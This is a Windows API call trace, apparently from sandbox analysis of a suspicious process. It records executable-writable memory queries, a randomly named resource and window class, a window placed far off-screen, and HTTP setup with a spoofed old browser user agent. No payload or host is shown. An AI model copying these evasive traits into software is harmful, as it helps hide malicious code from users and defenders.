[0090.568] SetWindowLongA (hWnd=0x16019c, nIndex=-4, dwNewLong=1380322) returned 43348024
[0090.568] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.568] SendMessageA (hWnd=0x16019c, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0090.568] DefWindowProcA (hWnd=0x16019c, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0090.569] DefWindowProcA (hWnd=0x16019c, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x101f7
[0090.569] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.569] SetClassLongA (hWnd=0x16019c, nIndex=-14, dwNewLong=65575) returned 0x0
[0090.570] GetSystemMenu (hWnd=0x16019c, bRevert=0) returned 0x101fd
[0090.570] DeleteMenu (hMenu=0x101fd, uPosition=0xf030, uFlags=0x0) returned 1
[0090.570] DeleteMenu (hMenu=0x101fd, uPosition=0xf000, uFlags=0x0) returned 1
[0090.570] DeleteMenu (hMenu=0x101fd, uPosition=0xf010, uFlags=0x0) returned 1
[0090.570] GetCurrentThreadId () returned 0xf4c
[0090.570] ResetEvent (hEvent=0xa0) returned 1
[0090.570] GetCurrentThreadId () returned 0xf4c
[0090.570] GetCurrentThreadId () returned 0xf4c
[0090.570] GetCurrentThreadId () returned 0xf4c
[0090.570] ResetEvent (hEvent=0xa0) returned 1
[0090.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f254, fWinIni=0x0 | out: pvParam=0x12f254) returned 1
[0090.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f254, fWinIni=0x0 | out: pvParam=0x12f254) returned 1
[0090.570] GetSystemMetrics (nIndex=49) returned 16
[0090.570] GetSystemMetrics (nIndex=50) returned 16
[0090.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12f29c, fWinIni=0x0 | out: pvParam=0x12f29c) returned 1
[0090.571] IsWindowVisible (hWnd=0x16019c) returned 0
[0090.571] GetCurrentThreadId () returned 0xf4c
[0090.571] VirtualQuery (in: lpAddress=0x2a11668, lpBuffer=0x12f16c, dwLength=0x1c | out: lpBuffer=0x12f16c*(BaseAddress=0x2a11000, AllocationBase=0x2950000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0090.571] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0090.571] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0090.571] LoadResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0x2a5f044
[0090.571] SizeofResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0xca5
[0090.571] LockResource (hResData=0x2a5f044) returned 0x2a5f044
[0090.571] GetCurrentThreadId () returned 0xf4c
[0090.571] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12ef20, fWinIni=0x0 | out: pvParam=0x12ef20) returned 1
[0090.571] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12ef20, fWinIni=0x0 | out: pvParam=0x12ef20) returned 1
[0090.571] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12ef20, fWinIni=0x0 | out: pvParam=0x12ef20) returned 1
[0090.571] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12ef20, fWinIni=0x0 | out: pvParam=0x12ef20) returned 1
[0090.572] GetDC (hWnd=0x0) returned 0x87010705
[0090.572] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.573] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0090.574] CreateFontIndirectA (lplf=0x12eebc) returned 0x120a087a
[0090.574] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.574] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.574] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.574] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.574] GetSystemMetrics (nIndex=6) returned 1
[0090.574] VirtualAlloc (lpAddress=0x2a74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a74000
[0090.575] GetDC (hWnd=0x0) returned 0x87010705
[0090.575] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.575] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.575] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.575] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.575] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.575] GetSystemMetrics (nIndex=6) returned 1
[0090.575] GetDC (hWnd=0x0) returned 0x87010705
[0090.575] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.575] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.575] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.575] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.575] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.575] GetSystemMetrics (nIndex=6) returned 1
[0090.576] GetDC (hWnd=0x0) returned 0x87010705
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.576] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.576] GetSystemMetrics (nIndex=6) returned 1
[0090.576] GetDC (hWnd=0x0) returned 0x87010705
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.576] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.576] GetSystemMetrics (nIndex=6) returned 1
[0090.576] GetDC (hWnd=0x0) returned 0x87010705
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.576] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.576] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.577] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.577] GetSystemMetrics (nIndex=6) returned 1
[0090.577] GetDC (hWnd=0x0) returned 0x87010705
[0090.577] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.577] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.577] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.577] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.577] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.577] GetSystemMetrics (nIndex=6) returned 1
[0090.577] GetDC (hWnd=0x0) returned 0x87010705
[0090.577] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.577] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.577] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.577] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.577] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.577] GetSystemMetrics (nIndex=6) returned 1
[0090.578] GetDC (hWnd=0x0) returned 0x87010705
[0090.578] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.578] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.578] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.578] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.578] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.578] GetSystemMetrics (nIndex=6) returned 1
[0090.578] GetDC (hWnd=0x0) returned 0x87010705
[0090.578] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.578] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.578] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.578] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.578] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.578] GetSystemMetrics (nIndex=6) returned 1
[0090.579] GetDC (hWnd=0x0) returned 0x87010705
[0090.579] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.579] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.579] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.579] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.579] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.579] GetSystemMetrics (nIndex=6) returned 1
[0090.579] GetDC (hWnd=0x0) returned 0x87010705
[0090.579] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.579] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.579] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.579] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.579] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.579] GetSystemMetrics (nIndex=6) returned 1
[0090.580] GetDC (hWnd=0x0) returned 0x87010705
[0090.580] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.580] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.580] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.580] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.580] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.580] GetSystemMetrics (nIndex=6) returned 1
[0090.580] GetDC (hWnd=0x0) returned 0x87010705
[0090.580] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.580] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.580] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.580] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.580] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.580] GetSystemMetrics (nIndex=6) returned 1
[0090.580] GetDC (hWnd=0x0) returned 0x87010705
[0090.580] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.581] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.581] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.581] GetSystemMetrics (nIndex=6) returned 1
[0090.581] GetDC (hWnd=0x0) returned 0x87010705
[0090.581] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.581] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.581] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.581] GetSystemMetrics (nIndex=6) returned 1
[0090.581] GetDC (hWnd=0x0) returned 0x87010705
[0090.581] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.581] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.581] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.581] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.581] GetSystemMetrics (nIndex=6) returned 1
[0090.581] GetDC (hWnd=0x0) returned 0x87010705
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.582] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.582] GetSystemMetrics (nIndex=6) returned 1
[0090.582] GetDC (hWnd=0x0) returned 0x87010705
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef18 | out: lptm=0x12ef18) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef50 | out: lptm=0x12ef50) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.582] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.582] GetSystemMetrics (nIndex=6) returned 1
[0090.582] GetDC (hWnd=0x0) returned 0x87010705
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec1c | out: lptm=0x12ec1c) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.582] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ec54 | out: lptm=0x12ec54) returned 1
[0090.582] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.582] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.582] GetSystemMetrics (nIndex=6) returned 1
[0090.583] GetDC (hWnd=0x0) returned 0x87010705
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.583] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.583] GetSystemMetrics (nIndex=6) returned 1
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.583] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.583] GetSystemMetrics (nIndex=6) returned 1
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef04 | out: lptm=0x12ef04) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x120a087a) returned 0x18a002e
[0090.583] GetTextMetricsA (in: hdc=0x87010705, lptm=0x12ef3c | out: lptm=0x12ef3c) returned 1
[0090.583] SelectObject (hdc=0x87010705, h=0x18a002e) returned 0x120a087a
[0090.583] ReleaseDC (hWnd=0x0, hDC=0x87010705) returned 1
[0090.584] GetSystemMetrics (nIndex=6) returned 1
[0090.586] SysReAllocStringLen (in: pbstr=0x2a7f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.586] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.586] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.586] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.586] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.586] SysReAllocStringLen (in: pbstr=0x2a7f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a7f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0090.586] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x12efa0, lpdwBufferLength=0x12efa4 | out: lpBuffer=0x12efa0, lpdwBufferLength=0x12efa4) returned 1
[0090.692] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x12efa0, dwBufferLength=0x4) returned 1
[0090.692] VirtualFree (lpAddress=0x2a80000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0090.692] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a76490, cbMultiByte=3, lpWideCharStr=0x12ded8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0090.692] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.692] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.693] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.693] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.693] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.693] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.693] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.693] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.693] GetWindowLongA (hWnd=0x16019c, nIndex=-20) returned 256
[0090.693] SetWindowLongA (hWnd=0x16019c, nIndex=-20, dwNewLong=384) returned 256
[0090.693] DefWindowProcA (hWnd=0x16019c, Msg=0x7c, wParam=0xffffffec, lParam=0x12eecc) returned 0x0
[0090.693] DefWindowProcA (hWnd=0x16019c, Msg=0x7d, wParam=0xffffffec, lParam=0x12eecc) returned 0x0
[0090.694] GetDesktopWindow () returned 0x10010
[0090.694] GetClassInfoA (in: hInstance=0x2950000, lpClassName="TmarxvxinhhmA", lpWndClass=0x12ef54 | out: lpWndClass=0x12ef54) returned 0
[0090.694] RegisterClassA (lpWndClass=0x12efa0) returned 0xcfc165
[0090.694] CreateWindowExA (dwExStyle=0x10000, lpClassName="TmarxvxinhhmA", lpWindowName="xx", dwStyle=0x6cf0000, X=17354, Y=19825, nWidth=814, nHeight=27, hWndParent=0x10010, hMenu=0x0, hInstance=0x2950000, lpParam=0x0)
[0090.694] SetWindowLongA (hWnd=0x101e6, nIndex=-4, dwNewLong=1380309) returned 43568552
[0090.694] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.694] SetPropA (hWnd=0x101e6, lpString=0xc153, hData=0x2a72184) returned 1
[0090.694] SetPropA (hWnd=0x101e6, lpString=0xc15a, hData=0x2a72184) returned 1
[0090.694] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x24, wParam=0x0, lParam=0x12ea24) returned 0x0
[0090.694] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x81, wParam=0x0, lParam=0x12ea08) returned 0x1
[0090.694] SetMenu (hWnd=0x101e6, hMenu=0x0)
[0090.694] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x46, wParam=0x0, lParam=0x12e664) returned 0x0
[0090.695] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x83, wParam=0x1, lParam=0x12e638) returned 0x0
[0090.695] InflateRect (in: lprc=0x12e638, dx=0, dy=0 | out: lprc=0x12e638) returned 1
[0090.695] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.695] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x47, wParam=0x0, lParam=0x12e664)
[0090.695] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x3, wParam=0x0, lParam=0x4d8f43d2) returned 0x0
[0090.695] IsIconic (hWnd=0x101e6) returned 0
[0090.695] GetWindowRect (in: hWnd=0x101e6, lpRect=0x12de0c | out: lpRect=0x12de0c) returned 1
[0090.695] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.695] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.695] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x5, wParam=0x0, lParam=0x31e) returned 0x0
[0090.695] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x12de18, fWinIni=0x0 | out: pvParam=0x12de18) returned 1
[0090.695] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.695] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.695] IsIconic (hWnd=0x101e6) returned 0
[0090.696] GetClientRect (in: hWnd=0x101e6, lpRect=0x12de00 | out: lpRect=0x12de00) returned 1
[0090.696] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.696] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.696] GetSystemMetrics (nIndex=20) returned 17
[0090.696] IsIconic (hWnd=0x101e6) returned 0
[0090.696] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.696] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.696] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 114229248
[0090.696] GetSystemMetrics (nIndex=20) returned 17
[0090.696] IsIconic (hWnd=0x101e6) returned 0
[0090.696] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.705] FlatSB_SetScrollProp (param_1=0x101e6, index=0x200, newValue=0x0, param_4=1) returned 0
[0090.711] GetSysColor (nIndex=20) returned 0xffffff
[0090.712] FlatSB_SetScrollProp (param_1=0x101e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.712] FlatSB_SetScrollInfo (param_1=0x101e6, code=0, psi=0x12de0e, fRedraw=1)
[0090.712] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x46, wParam=0x0, lParam=0x12dd0c) returned 0x0
[0090.712] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x83, wParam=0x1, lParam=0x12dce0) returned 0x0
[0090.712] InflateRect (in: lprc=0x12dce0, dx=0, dy=0 | out: lprc=0x12dce0) returned 1
[0090.712] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 115277824
[0090.712] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x47, wParam=0x0, lParam=0x12dd0c) returned 0x0
[0090.713] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0090.713] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0090.713] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0090.714] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x83, wParam=0x1, lParam=0x12d908) returned 0x0
[0090.714] InflateRect (in: lprc=0x12d908, dx=0, dy=0 | out: lprc=0x12d908) returned 1
[0090.716] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 115277824
[0090.716] IsIconic (hWnd=0x101e6) returned 0
[0090.716] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.716] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 115277824
[0090.716] IsIconic (hWnd=0x101e6) returned 0
[0090.716] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.716] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 115277824
[0090.716] IsIconic (hWnd=0x101e6) returned 0
[0090.716] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.716] FlatSB_SetScrollProp (param_1=0x101e6, index=0x100, newValue=0x0, param_4=1) returned 0
[0090.716] GetSysColor (nIndex=20) returned 0xffffff
[0090.716] FlatSB_SetScrollProp (param_1=0x101e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.716] FlatSB_SetScrollInfo (param_1=0x101e6, code=1, psi=0x12de0e, fRedraw=1)
[0090.716] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x46, wParam=0x0, lParam=0x12dd0c) returned 0x0
[0090.716] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x83, wParam=0x1, lParam=0x12dce0) returned 0x0
[0090.716] InflateRect (in: lprc=0x12dce0, dx=0, dy=0 | out: lprc=0x12dce0) returned 1
[0090.717] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.717] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x47, wParam=0x0, lParam=0x12dd0c) returned 0x0
[0090.717] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.717] IsIconic (hWnd=0x101e6) returned 0
[0090.717] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ddd0 | out: lpRect=0x12ddd0) returned 1
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-20) returned 65792
[0090.718] SetWindowLongA (hWnd=0x101e6, nIndex=-20, dwNewLong=65792)
[0090.718] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x7c, wParam=0xffffffec, lParam=0x12edf4) returned 0x0
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] IsIconic (hWnd=0x101e6) returned 0
[0090.718] GetWindowRect (in: hWnd=0x101e6, lpRect=0x12eee8 | out: lpRect=0x12eee8) returned 1
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x30, wParam=0x120a087a, lParam=0x1) returned 0x0
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] GetSystemMetrics (nIndex=21) returned 17
[0090.718] IsIconic (hWnd=0x101e6) returned 0
[0090.718] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efc0 | out: lpRect=0x12efc0) returned 1
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] IsIconic (hWnd=0x101e6) returned 0
[0090.718] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 117374976
[0090.718] IsIconic (hWnd=0x101e6) returned 0
[0090.718] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.718] FlatSB_SetScrollProp (param_1=0x101e6, index=0x200, newValue=0x0, param_4=0) returned 0
